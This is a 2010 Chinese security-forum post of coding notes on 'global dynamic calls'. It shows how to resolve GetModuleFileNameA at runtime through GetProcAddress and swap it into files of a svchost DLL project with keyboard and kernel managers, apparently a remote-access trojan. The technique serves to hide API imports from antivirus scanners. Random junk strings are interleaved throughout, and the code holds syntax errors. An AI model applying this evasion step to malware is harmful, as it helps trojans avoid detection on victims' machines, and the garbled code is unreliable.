标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
2 d- V y& z$ K2 J) c
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
0 A5 n4 `) R0 L1 w6 W: t4 r
----------------------------------------
. {; g- ]) ^ V$ s a
DTDY.h:
: I4 L. I& v% ]& m) \
5 v5 G( A% \, V2 i% Q) k9 p
#if _MSC_VER>1000
8 g) `# I' K* i3 w9 N5 v' T
#pragma once
; T' n8 C2 P- A/ ~
#endif //_MSC_VER>1000
* L$ e/ ]1 _3 `! H- }8 F) g
#include<windows.h>
6 J& ~' E e) |" B; s! L4 d0 ~
$ |& }' T. f: f2 m% X: D1 ?9 d
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
1 C, ^' m- [8 s
class DTDY
# p$ M# c8 X' O* ?2 t
{
0 W5 N. ~7 n# m* [# I2 A+ v+ k) z
public:
+ k1 G& X& c1 Z4 n, O5 x- [
DTDY();
5 x0 K: u5 i# W/ y- N- v- i
virtual ~DTDY();
$ X/ `" W% x" N( n* K
public:
! t8 f, s5 m3 s3 A
static pGetModuleFileNameA MyGetModuleFileName;
3 c! O: g- ~; A. y) P R6 h' ~# ?
static BOOL FunInitiallization();
! A( w# V* ], s7 U) d
};
2 F" T8 V+ R! ]% g2 \+ a3 r1 S
#endif
+ N; c' d$ |3 q V
----------------------------------------
: Q X' i K* b, H5 E
/ H l. O; H2 ~5 A E0 s: F" O
DTDY.cpp:
3 |+ K& g' R) M2 `
) `7 u- `& d0 `" A, C$ E
#include "DTDY.h"
' [1 C8 l M+ b; e# j ~
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
& ?7 Z$ u5 \- ~' ~
DTDY:TDY()
1 n/ b; J( @2 m A& p& A
{
: v! b& O" X# a1 x
}
$ B& Q, G- Q1 \) b: K4 L
DTDY::~DTDY()
7 j( Z! a/ k8 [9 C
{
* j5 g3 D8 e; d
}
7 D% j7 A) |0 s* m6 g
BOOL DTDY::FunInitiallization()
. c2 `" R2 o+ o7 U' {+ B
{
c1 Q, ~& N6 i: X
HMODULE hModule=LoadLibrary("kernel32.dll");
8 ]6 T( F8 X8 R o' N6 w, S$ H
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
! n' l" E0 ? V5 t. b$ o
if(!MyGetModuleFileName=) return FALSE;
1 B0 O# X9 T3 o1 i2 _
) G0 |+ e; V. H4 U# o) e4 q
return TRUE;
$ J4 Q( x: H( L& Q( d& S6 u
}
: T+ S, ?9 @2 j
----------------------------------------
0 r6 H& I0 y8 w
svchost.cpp:
2 H$ r, }$ M3 s7 [! P/ z
* l a& V. N7 _" g' G
#include "DTDY.h"
1 e+ j+ r" g6 f. T5 e D2 |& K
" \! ~+ x0 T6 Z: C6 h) c
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
+ D! X; F: [2 z# q, ]. K8 y! y$ x
{
9 @8 Y; b* S% M; B$ y5 P
switch(ul_reason_for_call)
$ O7 [ R% G8 E, E
{
: S# [, e5 ]% q7 c
case DLL_PROCESS_ATTACH:
, @$ ?+ E |9 b
if(!DTDY::FunInitiallization()) return FALSE;
! O& `" o8 S) P
. I3 ?/ I! @- w/ v' D
break;
: s7 U( V. s* O3 G! Z1 f/ w
}
( ~5 R" q" r# X& w3 L; g/ B4 C
}
! R( t/ p6 i9 B8 ^' G( I: w
) g7 x& z$ y+ w6 |
9 l" i6 r" ?! Y2 m
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
9 i8 i& l6 V; a
改写为
/ d( P$ D1 | j
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
0 [1 G) p( W3 J9 b, `- S: }
----------------------------------------
! h4 Q2 a; i. _! W# s) [3 u% ~
KernelManager.cpp:
. a/ |6 V: k( j3 g9 p; x
& N) [' @. S4 F
#include "../DTDY.h"
$ H6 g& a7 ?4 E ?
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
- E# }3 Q: q! E6 E; \
改写为
: i4 u, l8 S2 a* S; d+ g
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
* n( `# s! h9 x$ G; F
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
